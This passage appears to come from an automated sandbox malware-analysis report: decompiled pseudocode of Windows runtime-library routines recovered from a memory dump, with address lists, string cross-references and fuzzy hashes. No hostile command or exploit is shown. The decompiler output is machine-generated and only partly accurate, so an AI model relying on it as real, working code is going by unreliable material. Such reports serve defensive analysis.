_t333); _v32 = _t265; __eflags = _t265 - 0xc0000100; if(_t265 == 0xc0000100) { _v32 = E010E2C50(_v36, _a8, _t289, _a16, _a20, _t333, 1); } _v8 = _t326; E010E2ACB(); } } } L69: _v8 = 0xfffffffe; _t251 = _t333; } L70: return E0110D0D1(_t251); } L108: } 0x010e2584 0x010e2586 0x010e2590 0x010e2596 0x010e2597 0x010e2598 0x010e2599 0x010e259e 0x010e25a4 0x010e25a9 0x010e25ac 0x010e25ae 0x010e25b1 0x010e25b2 0x010e25b5 0x010e25b8 0x010e25bb 0x010e25bc 0x010e25bf 0x010e25c2 0x010e25c5 0x010e25c6 0x010e25cb 0x010e25ce 0x010e25d8 0x010e25db 0x010e25dd 0x010e25de 0x010e25e1 0x010e25e3 0x010e25e9 0x010e26da 0x010e26da 0x010e26dd 0x010e26e2 0x01125b56 0x00000000 0x010e26e8 0x010e26f9 0x010e26fb 0x010e26fe 0x010e2700 0x01125b60 0x00000000 0x010e2706 0x010e2706 0x010e270a 0x010e270a 0x010e270d 0x010e2713 0x010e2716 0x010e2718 0x010e271c 0x010e271e 0x01125b6c 0x01125b6f 0x01125b7f 0x01125b89 0x01125b8e 0x01125b93 0x01125b96 0x01125b9c 0x01125ba0 0x01125ba3 0x01125bab 0x01125bb0 0x01125bb3 0x01125bb3 0x01125ba3 0x010e2724 0x010e2726 0x010e2729 0x010e272c 0x010e279d 0x010e279d 0x010e27a0 0x010e27a2 0x00000000 0x010e272e 0x010e272e 0x010e2731 0x010e2734 0x010e2734 0x010e2736 0x01125bc1 0x01125bc1 0x01125bc4 0x00000000 0x01125bca 0x01125bca 0x01125bcd 0x00000000 0x01125bd3 0x00000000 0x01125bd3 0x01125bcd 0x010e273c 0x010e273c 0x010e2742 0x010e2747 0x010e274a 0x010e274d 0x010e2750 0x00000000 0x010e2756 0x010e2756 0x00000000 0x010e2902 0x010e2908 0x010e290b 0x00000000 0x010e2911 0x010e291c 0x010e2921 0x00000000 0x010e2921 0x00000000 0x00000000 0x010e2880 0x010e2887 0x010e288c 0x00000000 0x00000000 0x010e2805 0x010e280a 0x010e2814 0x010e2816 0x00000000 0x00000000 0x010e281e 0x010e2821 0x010e2823 0x00000000 0x010e2829 0x010e2829 0x010e2831 0x010e283c 0x010e283e 0x00000000 0x010e283e 0x00000000 0x00000000 0x010e284e 0x010e2850 0x010e2851 0x010e2854 0x010e2857 0x010e285a 0x010e285c 0x010e285d 0x00000000 0x00000000 0x010e275d 0x010e2761 0x00000000 0x010e2767 0x010e276e 0x010e2773 0x010e2773 0x010e2776 0x010e2778 0x010e277e 0x010e277e 0x010e2781 0x010e2781 0x010e2783 0x010e2784 0x00000000 0x00000000 0x01125bd8 0x01125bde 0x01125be4 0x01125be6 0x01125be8 0x01125be9 0x01125bee 0x01125bf8 0x01125bff 0x01125c01 0x01125c04 0x01125c07 0x01125c0b 0x01125c0d 0x01125c0d 0x01125c15 0x01125c18 0x01125c1b 0x01125c1b 0x01125c1e 0x00000000 0x00000000 0x010e28c3 0x010e28c8 0x010e28d2 0x010e28d4 0x010e28d8 0x010e28db 0x01125c26 0x01125c28 0x01125c2d 0x01125c2d 0x00000000 0x00000000 0x01125c34 0x01125c36 0x01125c49 0x01125c4e 0x01125c54 0x01125c5b 0x01125c5d 0x01125c60 0x010e2788 0x010e2788 0x010e278b 0x010e278e 0x010e278e 0x010e278e 0x010e2791 0x00000000 0x00000000 0x010e2756 0x010e2750 0x00000000 0x010e2794 0x010e2794 0x010e2795 0x010e2798 0x010e2798 0x00000000 0x010e2734 0x010e272c 0x010e2700 0x010e25ef 0x010e25ef 0x010e25ef 0x010e25f2 0x010e25f8 0x00000000 0x00000000 0x010e25fe 0x00000000 0x010e28e6 0x010e28ec 0x010e28ef 0x010e28f5 0x010e28f8 0x010e28f8 0x00000000 0x010e28f8 0x00000000 0x00000000 0x010e2866 0x010e2866 0x010e2876 0x010e2879 0x00000000 0x00000000 0x010e27e0 0x010e27e7 0x010e27e9 0x010e27eb 0x01125afd 0x00000000 0x01125afd 0x00000000 0x00000000 0x010e2633 0x010e2638 0x010e263b 0x010e263c 0x010e263e 0x010e2640 0x010e2642 0x010e2647 0x010e2649 0x010e264e 0x010e2650 0x010e2653 0x010e2659 0x010e26a2 0x010e26a7 0x010e26ac 0x010e26b2 0x01125b11 0x01125b15 0x01125b17 0x00000000 0x010e26b8 0x010e26b8 0x010e26ba 0x010e27a6 0x010e27a6 0x010e27a9 0x010e27ab 0x010e27b9 0x010e27b9 0x010e27be 0x010e27c1 0x010e27c3 0x010e27c5 0x010e27c7 0x01125c74 0x01125c79 0x01125c79 0x010e27c7 0x00000000 0x010e26c0 0x010e26c0 0x010e26c3 0x010e26c6 0x010e26c6 0x010e26c9 0x010e26c9 0x00000000 0x010e26c9 0x010e26ba 0x010e265b 0x010e265b 0x010e265e 0x010e2667 0x010e266d 0x010e2677 0x010e267c 0x010e267f 0x010e2681 0x01125b49 0x01125b4e 0x010e27cd 0x010e27d0 0x010e27d1 0x010e27d2 0x010e27d4 0x010e27dd 0x010e2687 0x010e2687 0x010e268a 0x010e268b 0x010e268e 0x010e268f 0x010e2691 0x010e2696 0x010e2698 0x010e269d 0x010e269f 0x00000000 0x010e269f 0x010e2681 0x00000000 0x00000000 0x010e2846 0x00000000 0x00000000 0x010e2605 0x010e260a 0x010e260c 0x010e2611 0x010e2616 0x010e2619 0x010e2619 0x010e261e 0x00000000 0x010e2624 0x010e2627 0x010e2627 0x00000000 0x00000000 0x01125b1f 0x00000000 0x00000000 0x010e2894 0x010e289b 0x010e289d 0x010e28a1 0x01125b2b 0x01125b2e 0x01125b2e 0x010e28a7 0x010e28a9 0x01125b04 0x01125b09 0x01125b09 0x01125b09 0x00000000 0x00000000 0x01125b35 0x01125b3c 0x010e28fb 0x010e28fb 0x010e26cc 0x010e26cc 0x010e26d0 0x00000000 0x010e26d2 0x010e26d2 0x00000000 0x010e26d2 0x00000000 0x00000000 0x010e25fe 0x010e292d 0x010e292f 0x010e2930 0x010e2935 0x010e2937 0x010e2938 0x010e293b 0x010e293c 0x010e293e 0x010e293f 0x010e2940 0x010e2942 0x010e2944 0x010e2948 0x010e294e 0x010e294f 0x010e2951 0x010e2951 0x010e2952 0x010e2954 0x010e295a 0x010e295c 0x010e2962 0x010e2963 0x010e2964 0x010e2966 0x010e2968 0x010e296b 0x010e296c 0x010e2972 0x010e2973 0x010e2977 0x010e2978 0x010e297b 0x010e297d 0x010e297e 0x010e297f 0x010e2980 0x010e2981 0x010e2982 0x010e2983 0x010e2984 0x010e2985 0x010e2986 0x010e2987 0x010e2988 0x010e2989 0x010e298a 0x010e298b 0x010e298c 0x010e298d 0x010e298e 0x010e298f 0x010e2990 0x010e2992 0x010e2997 0x010e29a3 0x010e29a6 0x010e29ab 0x010e29ad 0x010e29b0 0x010e29b2 0x01125c80 0x010e29b8 0x010e29b8 0x010e29bb 0x010e29c0 0x010e29c5 0x010e29c6 0x010e29c6 0x010e29c9 0x010e29cb 0x00000000 0x00000000 0x010e29cd 0x010e29d0 0x010e29d9 0x010e29db 0x010e29dd 0x010e2a7f 0x010e2a84 0x010e2a87 0x010e2a89 0x01125ca1 0x01125ca3 0x00000000 0x010e2a8f 0x010e2a8f 0x00000000 0x010e2a8f 0x00000000 0x010e29e3 0x010e29e3 0x010e29e3 0x00000000 0x010e29e3 0x010e29dd 0x00000000 0x010e29db 0x010e29e6 0x010e29e9 0x010e29eb 0x010e29ed 0x010e29f3 0x010e29f5 0x010e29f8 0x010e29fa 0x010e2a97 0x010e2a9a 0x010e2a9d 0x010e2add 0x00000000 0x010e2a9f 0x010e2aa2 0x010e2aa5 0x010e2aa8 0x010e2aab 0x01125cab 0x01125caf 0x01125cc5 0x01125cda 0x01125cdc 0x01125cdf 0x01125ce5 0x00000000 0x01125ceb 0x01125ced 0x01125cee 0x00000000 0x01125cee 0x01125cb1 0x01125cb4 0x01125cb9 0x01125cbb 0x00000000 0x01125cbd 0x01125cbd 0x00000000 0x01125cbd 0x01125cbb 0x010e2ab1 0x010e2ab1 0x010e2ac4 0x010e2ac6 0x010e2ac6 0x00000000 0x010e2ac6 0x010e2aab 0x00000000 0x010e2a00 0x010e2a09 0x010e2a0e 0x010e2a21 0x010e2a24 0x010e2a35 0x010e2a3a 0x010e2a3d 0x010e2a42 0x010e2a59 0x010e2a59 0x010e2a5c 0x010e2a5f 0x010e2a5f 0x010e29fa 0x010e29f3 0x010e2a64 0x010e2a64 0x010e2a6b 0x010e2a6b 0x010e2a6d 0x010e2a72 0x010e2a72 0x00000000

Strings

PATH , xrefs: 010E2642, 010E2691

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: PATH API String ID: 0-1036084923 Opcode ID: 32302d12cc446551771fc9585a3b25ace97ec2a6d8e0f924eeba7f9967e90272 Instruction ID: 3b719aee70bf641647b35a18d862b68530dba4be48cbc441e8ac5c70561a1e2a Opcode Fuzzy Hash: 32302d12cc446551771fc9585a3b25ace97ec2a6d8e0f924eeba7f9967e90272 Instruction Fuzzy Hash: 06C19FB1D40219DFDB29DF9AD885BEEBBF9FF48740F484029E581AB250D734A941CB60

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 63%

E010B2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) { signed char _v8; signed int _v12; signed int _v16; signed int _v20; signed int _v24; intOrPtr _v28; intOrPtr _v32; signed int _v52; void* __esi; void* __ebp; intOrPtr _t55; signed int _t57; signed int _t58; char* _t62; signed char* _t63; signed char* _t64; signed int _t67; signed int _t72; signed int _t77; signed int _t78; signed int _t88; intOrPtr _t89; signed char _t93; signed int _t97; signed int _t98; signed int _t102; signed int _t103; intOrPtr _t104; signed int _t105; signed int _t106; signed char _t109; signed int _t111; void* _t116; _t102 = __edi; _t97 = __edx; _v12 = _v12 & 0x00000000; _t55 = *[fs:0x18]; _t109 = __ecx; _v8 = __edx; _t86 = 0; _v32 = _t55; _v24 = 0; _push(__edi); if(__ecx == 0x11a5350) { _t86 = 1; _v24 = 1; *((intOrPtr*)(_t55 + 0xf84)) = 1; } _t103 = _t102 | 0xffffffff; if( *0x11a7bc8 != 0) { _push(0xc000004b); _push(_t103); E010F97C0(); } if( *0x11a79c4 != 0) { _t57 = 0; } else { _t57 = 0x11a79c8; } _v16 = _t57; if( *((intOrPtr*)(_t109 + 0x10)) == 0) { _t93 = _t109; L23(); } _t58 = *_t109; if(_t58 == _t103) { __eflags = *(_t109 + 0x14) & 0x01000000; _t58 = _t103; if(__eflags == 0) { _t93 = _t109; E010E1624(_t86, __eflags); _t58 = *_t109; } } _v20 = _v20 & 0x00000000; if(_t58 != _t103) { *((intOrPtr*)(_t58 + 0x14)) = *((intOrPtr*)(_t58 + 0x14)) + 1; } _t104 = *((intOrPtr*)(_t109 + 0x10)); _t88 = _v16; _v28 = _t104; L9: while(1) { if(E010D7D50() != 0) { _t62 = ( *[fs:0x30])[0x50] + 0x228; } else { _t62 = 0x7ffe0382; } if( *_t62 != 0) { _t63 = *[fs:0x30]; __eflags = _t63[0x240] & 0x00000002; if((_t63[0x240] & 0x00000002) != 0) { _t93 = _t109; E0114FE87(_t93); } } if(_t104 != 0xffffffff) { _push(_t88); _push(0); _push(_t104); _t64 = E010F9520(); goto L15; } else { while(1) { _t97 = &_v8; _t64 = E010EE18B(_t109 + 4, _t97, 4, _t88, 0); if(_t64 == 0x102) { break; } _t93 = *(_t109 + 4); _v8 = _t93; if((_t93 & 0x00000002) != 0) { continue; } L15: if(_t64 == 0x102) { break; } _t89 = _v24; if(_t64 < 0) { L0110DF30(_t93, _t97, _t64); _push(_t93); _t98 = _t97 | 0xffffffff; __eflags = *0x11a6901; _push(_t109); _v52 = _t98; if( *0x11a6901 != 0) { _push(0); _push(1); _push(0); _push(0x100003); _push( &_v12); _t72 = E010F9980(); __eflags = _t72; if(_t72 < 0) { _v12 = _t98 | 0xffffffff; } } asm("lock cmpxchg [ecx], edx"); _t111 = 0; __eflags = 0; if(0 != 0) { __eflags = _v12 - 0xffffffff; if(_v12 != 0xffffffff) { _push(_v12); E010F95D0(); } } else { _t111 = _v12; } return _t111; } else { if(_t89 != 0) { *((intOrPtr*)(_v32 + 0xf84)) = 0; _t77 = E010D7D50(); __eflags = _t77; if(_t77 == 0) { _t64 = 0x7ffe0384; } else { _t64 = ( *[fs:0x30])[0x50] + 0x22a; } __eflags = *_t64; if( *_t64 != 0) { _t64 = *[fs:0x30]; __eflags = _t64[0x240] & 0x00000004; if((_t64[0x240] & 0x00000004) != 0) { _t78 = E010D7D50(); __eflags = _t78; if(_t78 == 0) { _t64 = 0x7ffe0385; } else { _t64 = ( *[fs:0x30])[0x50] + 0x22b; } __eflags = *_t64 & 0x00000020; if(( *_t64 & 0x00000020) != 0) { _t64 = E01137016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0); } } } } return _t64; } } _t97 = _t88; _t93 = _t109; E0114FDDA(_t97, _v12); _t105 = *_t109; _t67 = _v12 + 1; _v12 = _t67; __eflags = _t105 - 0xffffffff; if(_t105 == 0xffffffff) { _t106 = 0; __eflags = 0; } else { _t106 = *(_t105 + 0x14); } __eflags = _t67 - 2; if(_t67 > 2) { __eflags = _t109 - 0x11a5350; if(_t109 != 0x11a5350) { __eflags = _t106 - _v20; if(__eflags == 0) { _t93 = _t109; E0114FFB9(_t88, _t93, _t97, _t106, _t109, __eflags); } } } _push("RTL: Re-Waiting\n"); _push(0); _push(0x65); _v20 = _t106; E01145720(); _t104 = _v28; _t116 = _t116 + 0xc; continue; } } } 0x010b2d8a 0x010b2d8a 0x010b2d92 0x010b2d96 0x010b2d9e 0x010b2da0 0x010b2da3 0x010b2da5 0x010b2da8 0x010b2dab 0x010b2db2 0x0110f9aa 0x0110f9ab 0x0110f9ae 0x0110f9ae 0x010b2db8 0x010b2dc2 0x0110f9b9 0x0110f9be 0x0110f9bf 0x0110f9bf 0x010b2dcf 0x0110f9c9 0x010b2dd5 0x010b2dd5 0x010b2dd5 0x010b2dde 0x010b2de1 0x010b2e70 0x010b2e72 0x010b2e72 0x010b2de7 0x010b2deb 0x010b2e7c 0x010b2e83 0x010b2e85 0x010b2e8b 0x010b2e8d 0x010b2e92 0x010b2e92 0x010b2e85 0x010b2df1 0x010b2df7 0x010b2df9 0x010b2df9 0x010b2dfc 0x010b2dff 0x010b2e02 0x00000000 0x010b2e05 0x010b2e0c 0x0110f9d9 0x010b2e12 0x010b2e12 0x010b2e12 0x010b2e1a 0x0110f9e3 0x0110f9e9 0x0110f9f0 0x0110f9f6 0x0110f9f8 0x0110f9f8 0x0110f9f0 0x010b2e23 0x0110fa02 0x0110fa03 0x0110fa05 0x0110fa06 0x00000000 0x010b2e29 0x010b2e29 0x010b2e2e 0x010b2e34 0x010b2e3e 0x00000000 0x00000000 0x010b2e44 0x010b2e47 0x010b2e4d 0x00000000 0x00000000 0x010b2e4f 0x010b2e54 0x00000000 0x00000000 0x010b2e5a 0x010b2e5f 0x010b2e9a 0x010b2ea4 0x010b2ea5 0x010b2ea8 0x010b2eaf 0x010b2eb2 0x010b2eb5 0x0110fae9 0x0110faeb 0x0110faed 0x0110faef 0x0110faf7 0x0110faf8 0x0110fafd 0x0110faff 0x0110fb04 0x0110fb04 0x0110faff 0x010b2ec0 0x010b2ec4 0x010b2ec6 0x010b2ec8 0x0110fb14 0x0110fb18 0x0110fb1e 0x0110fb21 0x0110fb21 0x010b2ece 0x010b2ece 0x010b2ece 0x010b2ed7 0x010b2e61 0x010b2e63 0x0110fa6b 0x0110fa71 0x0110fa76 0x0110fa78 0x0110fa8a 0x0110fa7a 0x0110fa83 0x0110fa83 0x0110fa8f 0x0110fa91 0x0110fa97 0x0110fa9d 0x0110faa4 0x0110faaa 0x0110faaf 0x0110fab1 0x0110fac3 0x0110fab3 0x0110fabc 0x0110fabc 0x0110fac8 0x0110facb 0x0110fadf 0x0110fadf 0x0110facb 0x0110faa4 0x0110fa91 0x010b2e6f 0x010b2e6f 0x010b2e5f 0x0110fa13 0x0110fa15 0x0110fa17 0x0110fa1f 0x0110fa21 0x0110fa22 0x0110fa25 0x0110fa28 0x0110fa2f 0x0110fa2f 0x0110fa2a 0x0110fa2a 0x0110fa2a 0x0110fa31 0x0110fa34 0x0110fa36 0x0110fa3c 0x0110fa3e 0x0110fa41 0x0110fa43 0x0110fa45 0x0110fa45 0x0110fa41 0x0110fa3c 0x0110fa4a 0x0110fa4f 0x0110fa51 0x0110fa53 0x0110fa56 0x0110fa5b 0x0110fa5e 0x00000000 0x0110fa5e 0x010b2e23

Strings

RTL: Re-Waiting , xrefs: 0110FA4A

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: RTL: Re-Waiting API String ID: 0-316354757 Opcode ID: 91e0a7d999389ce07d665d196c006180212f3d195ae174566499bd9df1d352cb Instruction ID: 35206f6f57e40f0af8b4faca13b607bd63b44c84a7dc101e8f59fc916d290602 Opcode Fuzzy Hash: 91e0a7d999389ce07d665d196c006180212f3d195ae174566499bd9df1d352cb Instruction Fuzzy Hash: 11613531E00606DFDB3BDF6CC881BBE7BE5EB44714F1442A9E5A1972C1D7B4A9828781

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%

E010B52A5(char __ecx) { char _v20; char _v28; char _v29; void* _v32; void* _v36; void* _v37; void* _v38; void* _v40; void* _v46; void* _v64; void* __ebx; intOrPtr* _t49; signed int _t53; short _t85; signed int _t87; signed int _t88; signed int _t89; intOrPtr _t101; intOrPtr* _t102; intOrPtr* _t104; signed int _t106; void* _t108; _t93 = __ecx; _t108 = (_t106 & 0xfffffff8) - 0x1c; _push(_t88); _v29 = __ecx; _t89 = _t88 | 0xffffffff; while(1) { E010CEEF0(0x11a79a0); _t104 = *0x11a8210; // 0x5e2d68 if(_t104 == 0) { break; } asm("lock inc dword [esi]"); *((intOrPtr*)(_t108 + 0x18)) = *((intOrPtr*)(_t104 + 8)); E010CEB70(_t93, 0x11a79a0); if( *((char*)(_t108 + 0xf)) != 0) { _t101 = *0x7ffe02dc; __eflags = *(_t104 + 0x14) & 0x00000001; if(( *(_t104 + 0x14) & 0x00000001) != 0) { L9: _push(0); _push(0); _push(0); _push(0); _push(0x90028); _push(_t108 + 0x20); _push(0); _push(0); _push(0); _push( *((intOrPtr*)(_t104 + 4))); _t53 = E010F9890(); __eflags = _t53; if(_t53 >= 0) { __eflags = *(_t104 + 0x14) & 0x00000001; if(( *(_t104 + 0x14) & 0x00000001) == 0) { E010CEEF0(0x11a79a0); *((intOrPtr*)(_t104 + 8)) = _t101; E010CEB70(0, 0x11a79a0); } goto L3; } __eflags = _t53 - 0xc0000012; if(__eflags == 0) { L12: _t13 = _t104 + 0xc; // 0x5e2d75 _t93 = _t13; *((char*)(_t108 + 0x12)) = 0; __eflags = E010EF0BF(_t13, *(_t104 + 0xe) & 0x0000ffff, __eflags, &_v28); if(__eflags >= 0) { L15: _t102 = _v28; *_t102 = 2; *((intOrPtr*)(_t108 + 0x18)) = *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24; E010CEEF0(0x11a79a0); __eflags = *0x11a8210 - _t104; // 0x5e2d68 if(__eflags == 0) { __eflags = *((char*)(_t108 + 0xe)); _t95 = *((intOrPtr*)(_t108 + 0x14)); *0x11a8210 = _t102; _t32 = _t102 + 0xc; // 0x0 *_t95 = *_t32; _t33 = _t102 + 0x10; // 0x0 *((intOrPtr*)(_t95 + 4)) = *_t33; _t35 = _t102 + 4; // 0xffffffff *((intOrPtr*)(_t95 + 8)) = *_t35; if(__eflags != 0) { _t95 = *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))); E01134888(_t89, *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags); } E010CEB70(_t95, 0x11a79a0); asm("lock xadd [esi], eax"); if(__eflags == 0) { _push( *((intOrPtr*)(_t104 + 4))); E010F95D0(); L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104); _t102 = *((intOrPtr*)(_t108 + 0x10)); } asm("lock xadd [esi], ebx"); __eflags = _t89 == 1; if(_t89 == 1) { _push( *((intOrPtr*)(_t104 + 4))); E010F95D0(); L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104); _t102 = *((intOrPtr*)(_t108 + 0x10)); } _t49 = _t102; L4: return _t49; } E010CEB70(_t93, 0x11a79a0); asm("lock xadd [esi], eax"); if(__eflags == 0) { _push( *((intOrPtr*)(_t104 + 4))); E010F95D0(); L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104); _t102 = *((intOrPtr*)(_t108 + 0x10)); } *_t102 = 1; asm("lock xadd [edi], eax"); if(__eflags == 0) { _t28 = _t102 + 4; // 0xffffffff _push( *_t28); E010F95D0(); L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102); } continue; } _t93 = &_v20; *((intOrPtr*)(_t108 + 0x20)) = *((intOrPtr*)(_t104 + 0x10)); _t85 = 6; _v20 = _t85; _t87 = E010EF0BF( &_v20, *(_t104 + 0xe) & 0x0000ffff, __eflags, &_v28); __eflags = _t87; if(_t87 < 0) { goto L3; } *((char*)(_t108 + 0xe)) = 1; goto L15; } __eflags = _t53 - 0xc000026e; if(__eflags != 0) { goto L3; } goto L12; } __eflags = 0x7ffe02dc - *((intOrPtr*)(_t108 + 0x14)); if(0x7ffe02dc == *((intOrPtr*)(_t108 + 0x14))) { goto L3; } else { goto L9; } } L3: _t49 = _t104; goto L4; } _t49 = 0; goto L4; } 0x010b52a5 0x010b52ad 0x010b52b0 0x010b52b3 0x010b52b7 0x010b52ba 0x010b52bf 0x010b52c4 0x010b52cc 0x00000000 0x00000000 0x010b52ce 0x010b52d9 0x010b52dd 0x010b52e7 0x010b52f7 0x010b52f9 0x010b52fd 0x01110dcf 0x01110dd5 0x01110dd6 0x01110dd7 0x01110dd8 0x01110dd9 0x01110dde 0x01110ddf 0x01110de0 0x01110de1 0x01110de2 0x01110de5 0x01110dea 0x01110dec 0x01110f60 0x01110f64 0x01110f70 0x01110f76 0x01110f79 0x01110f79 0x00000000 0x01110f64 0x01110df2 0x01110df7 0x01110e04 0x01110e0d 0x01110e0d 0x01110e10 0x01110e1a 0x01110e1c 0x01110e4c 0x01110e52 0x01110e61 0x01110e67 0x01110e6b 0x01110e70 0x01110e76 0x01110ed7 0x01110edc 0x01110ee0 0x01110ee6 0x01110eea 0x01110eed 0x01110ef0 0x01110ef3 0x01110ef6 0x01110ef9 0x01110efe 0x01110f01 0x01110f01 0x01110f0b 0x01110f12 0x01110f16 0x01110f18 0x01110f1b 0x01110f2c 0x01110f31 0x01110f31 0x01110f35 0x01110f39 0x01110f3a 0x01110f3c 0x01110f3f 0x01110f50 0x01110f55 0x01110f55 0x01110f59 0x010b52eb 0x010b52f1 0x010b52f1 0x01110e7d 0x01110e84 0x01110e88 0x01110e8a 0x01110e8d 0x01110e9e 0x01110ea3 0x01110ea3 0x01110ea7 0x01110eaf 0x01110eb3 0x01110eb9 0x01110eb9 0x01110ebc 0x01110ecd 0x01110ecd 0x00000000 0x01110eb3 0x01110e21 0x01110e2b 0x01110e2f 0x01110e30 0x01110e3a 0x01110e3f 0x01110e41 0x00000000 0x00000000 0x01110e47 0x00000000 0x01110e47 0x01110df9 0x01110dfe 0x00000000 0x00000000 0x00000000 0x01110dfe 0x010b5303 0x010b5307 0x00000000 0x010b5309 0x00000000 0x010b5309 0x010b5307 0x010b52e9 0x010b52e9 0x00000000 0x010b52e9 0x010b530e 0x00000000

Strings

h-^ , xrefs: 010B52C4, 01110E70, 01110EE0

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: h-^ API String ID: 0-360474006 Opcode ID: d87b73193044a0d52b8cae945ce7b41689c606491c89e3365e3f254c433bc797 Instruction ID: 844446dc5889652371e5b0d228e7b24751aa1a42de310091228940923e4e3118 Opcode Fuzzy Hash: d87b73193044a0d52b8cae945ce7b41689c606491c89e3365e3f254c433bc797 Instruction Fuzzy Hash: 1C51BB301063429FD725EF68C842BABBBE4BF54B14F14096EF5D587651E770E844CB92

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 80%

E01180EA5(void* __ecx, void* __edx) { signed int _v20; char _v24; intOrPtr _v28; unsigned int _v32; signed int _v36; intOrPtr _v40; char _v44; intOrPtr _v64; void* __ebx; void* __edi; signed int _t58; unsigned int _t60; intOrPtr _t62; char* _t67; char* _t69; void* _t80; void* _t83; intOrPtr _t93; intOrPtr _t115; char _t117; void* _t120; _t83 = __edx; _t117 = 0; _t120 = __ecx; _v44 = 0; if(E0117FF69(__ecx, &_v44, &_v32) < 0) { L24: _t109 = _v44; if(_v44 != 0) { E01181074(_t83, _t120, _t109, _t117, _t117); } L26: return _t117; } _t93 = *((intOrPtr*)(__ecx + 0x3c)); _t5 = _t83 + 1; // 0x1 _v36 = _t5 << 0xc; _v40 = _t93; _t58 = *(_t93 + 0xc) & 0x40000000; asm("sbb ebx, ebx"); _t83 = ( ~_t58 & 0x0000003c) + 4; if(_t58 != 0) { _push(0); _push(0x14); _push( &_v24); _push(3); _push(_t93); _push(0xffffffff); _t80 = E010F9730(); _t115 = _v64; if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) { _push(_t93); E0117A80D(_t115, 1, _v20, _t117); _t83 = 4; } } if(E0117A854( &_v44, &_v36, _t117, 0x40001000, _t83, _t117, *((intOrPtr*)(_t120 + 0x34)), *((intOrPtr*)(_t120 + 0x38))) < 0) { goto L24; } _t60 = _v32; _t97 = (_t60 != 0x100000) + 1; _t83 = (_v44 - *0x11a8b04 >> 0x14) + (_v44 - *0x11a8b04 >> 0x14); _v28 = (_t60 != 0x100000) + 1; _t62 = _t83 + (_t60 >> 0x14) * 2; _v40 = _t62; if(_t83 >= _t62) { L10: asm("lock xadd [eax], ecx"); asm("lock xadd [eax], ecx"); if(E010D7D50() == 0) { _t67 = 0x7ffe0380; } else { _t67 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226; } if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) { E0117138A(_t83, *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc); } if(E010D7D50() == 0) { _t69 = 0x7ffe0388; } else { _t69 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e; } if( *_t69 != 0) { E0116FEC0(_t83, *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32); } if(( *0x11a8724 & 0x00000008) != 0) { E011752F8( *((intOrPtr*)(_t120 + 0x3c)), *((intOrPtr*)(_t120 + 0x28))); } _t117 = _v44; goto L26; } while(E011815B5(0x11a8ae4, _t83, _t97, _t97) >= 0) { _t97 = _v28; _t83 = _t83 + 2; if(_t83 < _v40) { continue; } goto L10; } goto L24; } 0x01180eb7 0x01180eb9 0x01180ec0 0x01180ec2 0x01180ecd 0x0118105b 0x0118105b 0x01181061 0x01181066 0x01181066 0x0118106b 0x01181073 0x01181073 0x01180ed3 0x01180ed6 0x01180edc 0x01180ee0 0x01180ee7 0x01180ef0 0x01180ef5 0x01180efa 0x01180efc 0x01180efd 0x01180f03 0x01180f04 0x01180f06 0x01180f07 0x01180f09 0x01180f0e 0x01180f14 0x01180f23 0x01180f2d 0x01180f34 0x01180f34 0x01180f14 0x01180f52 0x00000000 0x00000000 0x01180f58 0x01180f73 0x01180f74 0x01180f79 0x01180f7d 0x01180f80 0x01180f86 0x01180fab 0x01180fb5 0x01180fc6 0x01180fd1 0x01180fe3 0x01180fd3 0x01180fdc 0x01180fdc 0x01180feb 0x01181009 0x01181009 0x01181015 0x01181027 0x01181017 0x01181020 0x01181020 0x0118102f 0x0118103c 0x0118103c 0x01181048 0x01181050 0x01181050 0x01181055 0x00000000 0x01181055 0x01180f88 0x01180f9e 0x01180fa2 0x01180fa9 0x00000000 0x00000000 0x00000000 0x01180fa9 0x00000000

Strings

` , xrefs: 01180F16

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: ` API String ID: 0-2679148245 Opcode ID: 3f84ab6b4bce470927556d3bb020aa7f73cad7fc8e8cfc58a67fbc4102ba62ce Instruction ID: 08d02a3b178210e44e769618cdb8ade1853aa9256f6e1fe1c053ecda90832b8f Opcode Fuzzy Hash: 3f84ab6b4bce470927556d3bb020aa7f73cad7fc8e8cfc58a67fbc4102ba62ce Instruction Fuzzy Hash: 955190713043429FD329EF28D880B5BBBE5EBC4714F14892CF69697290D771E806CB62

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%

